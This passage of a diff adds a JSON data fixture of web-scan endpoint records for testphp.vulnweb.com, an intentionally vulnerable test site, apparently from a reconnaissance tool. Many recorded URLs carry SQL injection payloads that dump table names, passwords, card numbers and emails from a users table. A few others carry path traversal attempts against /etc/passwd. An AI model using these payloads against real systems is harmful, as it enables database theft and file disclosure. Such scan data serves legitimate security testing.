"response_time": 0.349669539, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1353, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-", + "content_length": 137, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:40.028Z", + "response_time": 0.353421289, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1354, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10", + "content_length": 100, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:40.152Z", + "response_time": 0.352081809, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1355, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10CONFIRMED", + "content_length": 137, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:40.267Z", + "response_time": 0.349061992, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1363, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php", + "content_length": 4697, + "page_title": "Document titleg", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:44.182Z", + "response_time": 0.347442691, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1366, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "content_length": 400, + "page_title": "Index of /_mmServerScripts/", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:47.890Z", + "response_time": 0.171100834, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1368, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/_mmServerScripts/MMHTTPDB.php", + "content_length": 93, + "page_title": null, + "http_status": 200, + "content_type": "text/html; charset=UTF-8", + "discovered_date": "2024-11-13T02:22:48.194Z", + "response_time": 0.171393339, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1382, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/admin/create.sql", + "content_length": 523, + "page_title": null, + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:22:50.265Z", + "response_time": 0.340189772, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1389, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php", + "content_length": 5328, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:53.657Z", + "response_time": 0.358537833, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1395, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?%20artist=1-SLEEP(3", + "content_length": 4853, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:55.171Z", + "response_time": 0.353931067, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1396, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92", + "content_length": 5328, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:58.267Z", + "response_time": 0.351658227, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1397, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZ", + "content_length": 5328, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:58.546Z", + "response_time": 0.349523651, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1398, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZ000003:C=200", + "content_length": 5328, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:59.291Z", + "response_time": 0.362411364, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1399, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZ000003:C=200118", + "content_length": 5328, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:59.456Z", + "response_time": 0.348274333, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1400, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?%CB%93%E2%86%92artist=FUZZFUZ2Z", + "content_length": 5328, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:22:59.592Z", + "response_time": 0.34050327199999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1407, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=%271+2%27", + "content_length": 6251, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:00.645Z", + "response_time": 0.350075346, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1410, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=%273%27", + "content_length": 6193, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:01.066Z", + "response_time": 0.345051061, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1411, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=%273-2%27", + "content_length": 6193, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:01.211Z", + "response_time": 0.355077096, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1412, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=%274%27", + "content_length": 4735, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:01.357Z", + "response_time": 0.35612738, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1415, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1", + "content_length": 4735, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:03.694Z", + "response_time": 0.361970958, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1417, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20UNION%20SELECT%201,version(),current_user()", + "content_length": 5034, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:04.138Z", + "response_time": 0.35045982400000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1418, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20database%20(),%203", + "content_length": 5002, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:04.369Z", + "response_time": 0.354122053, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1421, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%200,1", + "content_length": 5003, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:04.937Z", + "response_time": 0.353345991, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1422, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%201,1", + "content_length": 5001, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:05.169Z", + "response_time": 0.34932687700000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1423, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%202,1", + "content_length": 5001, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:05.447Z", + "response_time": 0.36478214800000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1424, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20table_name,%203%20from%20information_schema.tables%20WHERE%20table_schema%20=%20database%20()%20limit%203,1", + "content_length": 5004, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:05.668Z", + "response_time": 0.35337794100000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1426, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,%20version%20(),%20current_user%20()", + "content_length": 5034, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:08.641Z", + "response_time": 0.34738230600000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1427, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,2,3", + "content_length": 4997, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:08.933Z", + "response_time": 0.355201938, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1428, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,2,group_concat(pass)%20from%20users--", + "content_length": 5000, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:09.682Z", + "response_time": 0.344010289, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1429, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(cc),3%20from%20users", + "content_length": 5015, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:09.911Z", + "response_time": 0.35489819499999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1430, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name='users'", + "content_length": 5039, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:10.194Z", + "response_time": 0.348750574, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1431, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(email),3%20from%20users", + "content_length": 5024, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:10.447Z", + "response_time": 0.355272646, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1432, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-1%20union%20select%201,group_concat(uname),3%20from%20users", + "content_length": 5000, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:10.700Z", + "response_time": 0.358057119, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1433, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=-2", + "content_length": 4735, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:10.943Z", + "response_time": 0.343274744, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1434, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=0", + "content_length": 4735, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:11.191Z", + "response_time": 0.356170884, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1436, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=1%20AND%201=0", + "content_length": 4735, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:11.697Z", + "response_time": 0.356093393, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1459, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=10", + "content_length": 4735, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:20.332Z", + "response_time": 0.358040011, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1468, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=2", + "content_length": 6193, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:21.547Z", + "response_time": 0.34924093900000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1470, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=2978", + "content_length": 4735, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:21.840Z", + "response_time": 0.353082636, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1471, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=3", + "content_length": 6193, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:22.000Z", + "response_time": 0.35283239, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1474, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=9", + "content_length": 4735, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:24.571Z", + "response_time": 0.339845275, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1475, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist=999999.9", + "content_length": 4735, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:24.705Z", + "response_time": 0.350171228, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1481, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?file=..", + "content_length": 5328, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:26.300Z", + "response_time": 0.354703241, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1482, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?file=../../../admin.php", + "content_length": 5328, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:26.530Z", + "response_time": 0.351857148, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1483, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?file=../../../etc/passwd", + "content_length": 5328, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:28.012Z", + "response_time": 0.34956026100000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1493, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "content_length": 767, + "page_title": "Administrative panel", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:30.994Z", + "response_time": 0.343660293, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1494, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l/index.php", + "content_length": 767, + "page_title": "Administrative panel", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:31.136Z", + "response_time": 0.348789533, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1495, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l/style.css", + "content_length": 615, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:23:31.268Z", + "response_time": 0.348615835, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1496, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/bxss/cleanDatabase.php", + "content_length": 396, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:31.370Z", + "response_time": 0.373136574, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1497, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/bxss/database_connect.php", + "content_length": 220, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:31.502Z", + "response_time": 0.35546721200000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1498, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/bxss/index.php", + "content_length": 102, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:31.634Z", + "response_time": 0.342586602, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1499, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/bxss/test.js", + "content_length": 19, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:23:31.755Z", + "response_time": 0.35261396300000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1500, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/bxss/vuln.php?id=1", + "content_length": 396, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:31.850Z", + "response_time": 0.35714151800000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1501, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/cart.php", + "content_length": 4903, + "page_title": "you cart", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:31.967Z", + "response_time": 0.346853146, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1505, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/categories.php", + "content_length": 6115, + "page_title": "picture categories", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:23:34.982Z", + "response_time": 0.348458331, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": 